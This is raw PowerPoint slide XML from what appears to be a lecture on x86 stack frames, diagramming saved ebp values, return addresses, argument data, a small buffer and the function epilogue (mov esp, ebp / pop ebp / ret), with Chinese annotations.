          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="32448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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63493" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="35496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63494" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="38385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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63495" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="41433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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63496" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="44481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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63497" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="47529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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63498" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="50577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63499" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="53625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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63500" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="56673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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63501" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62928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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63502" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59880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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63503" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="26352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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63504" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="33670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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63505" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="49672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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63506" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5988050"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63507" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="63491" idx="3"/>
            <a:endCxn id="63496" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3092450"/>
            <a:ext cx="1588" cy="1508125"/>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63508" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="44338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3509" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="59578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3510" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="29098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3511" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6597650"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63512" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="63499" idx="3"/>
            <a:endCxn id="63500" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5514975"/>
            <a:ext cx="1588" cy="304800"/>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63513" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63514" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="63513" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2324100"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63515" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="63516" idx="3"/>
            <a:endCxn id="63494" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4708525" y="3990975"/>
            <a:ext cx="320675" cy="31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3516" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3810000"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63517" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="63518" idx="3"/>
            <a:endCxn id="63496" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="4600575"/>
            <a:ext cx="304800" cy="31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3518" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="4419600"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63519" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3200400"/>
            <a:ext cx="2514600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 107954"/>
              <a:gd name="adj2" fmla="val -33463"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回控制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>leave / return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>序列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63520" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2057400"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63521" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1676400"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a: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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018584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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="29400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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="32448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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64517" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="35496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64518" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="38385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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64519" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="41433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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64520" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="44481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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64521" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="47529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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64522" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="50577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64523" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="53625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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64524" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="56673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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64525" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62928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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64526" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59880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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64527" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="26352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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64528" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="33670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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64529" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="49672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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64530" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5988050"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64531" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64515" idx="3"/>
            <a:endCxn id="64520" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3092450"/>
            <a:ext cx="1588" cy="1508125"/>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64532" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="44338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4533" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="59578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4534" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="29098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4535" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6597650"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64536" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64523" idx="3"/>
            <a:endCxn id="64524" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5514975"/>
            <a:ext cx="1588" cy="304800"/>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64537" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64538" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="64537" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2324100"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64539" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64540" idx="3"/>
            <a:endCxn id="64542" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3794125" y="4603750"/>
            <a:ext cx="33655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4540" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="4419600"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64541" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="64542" idx="3"/>
            <a:endCxn id="64520" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724400" y="4600575"/>
            <a:ext cx="304800" cy="31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4542" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
